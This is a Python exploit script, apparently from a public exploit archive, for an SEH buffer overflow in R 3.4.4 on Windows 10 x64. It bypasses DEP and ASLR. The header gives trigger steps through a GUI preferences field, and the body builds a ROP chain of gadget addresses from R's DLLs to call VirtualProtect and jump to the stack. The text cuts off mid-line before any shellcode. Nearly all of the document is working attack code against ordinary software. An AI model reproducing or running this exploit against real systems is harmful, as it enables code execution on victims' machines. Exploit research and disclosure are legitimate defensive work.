#!/usr/bin/python # Exploit Title: R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH(DEP/ASLR Bypass) # Date: 2019-07-15 # Exploit Author: blackleitus # Vendor Homepage: https://www.r-project.org/ # Tested on: Windows 10 Home Single Language 64-bit # Social: https://twitter.com/blackleitus # Website: https://skybulk.github.io/ # discovered by: bzyo # GUI Preferences -> paste payload.txt into 'Language for menus ...' -> click OK import struct outfile = 'payload.txt' def create_rop_chain(): rop_gadgets = [ 0x6c998f58, # POP EAX # RETN [R.dll] 0x6379973c, # ptr to &VirtualProtect() [IAT methods.dll] 0x6fee2984, # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll] 0x6ca1ba76, # XCHG EAX,ESI # RETN [R.dll] 0x64c45cb8, # POP ECX # RETN ** [methods.dll] ** | {PAGE_EXECUTE_READ} 0x64c46010, # &Writable location [methods.dll] 0x6cacc7e2, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ} 0xffffffc0, # Value to negate, will become 0x00000040 0x7139c7ba, # NEG EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ} 0x6ca3485a, # XCHG EAX,EDX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ} 0x7135a862, # POP EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ} 0xfffffdff, # Value to negate, will become 0x00000201 0x6e7d41ca, # NEG EAX # RETN ** [utils.dll] ** | {PAGE_EXECUTE_READ} 0x63742597, # XCHG EAX,EBX # RETN ** [Rgraphapp.dll] ** | {PAGE_EXECUTE_READ} 0x6cbef3c0, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ} 0x41414141, # Filler (compensate) 0x6c9b1de7, # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ} 0x6ca2a9bd, # & jmp esp [R.dll] 0x6cbebfa6, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ} 0x90909090, # nop 0x6ca00e93, # POP EDI # RETN [R.dll] 0x6375fe5c, # RETN (ROP NOP) [Rgraphapp.dll] 0x6ff1b7bb, # PUSHAD # RETN [grDevices.dll] ] return ''.join(struct.pack('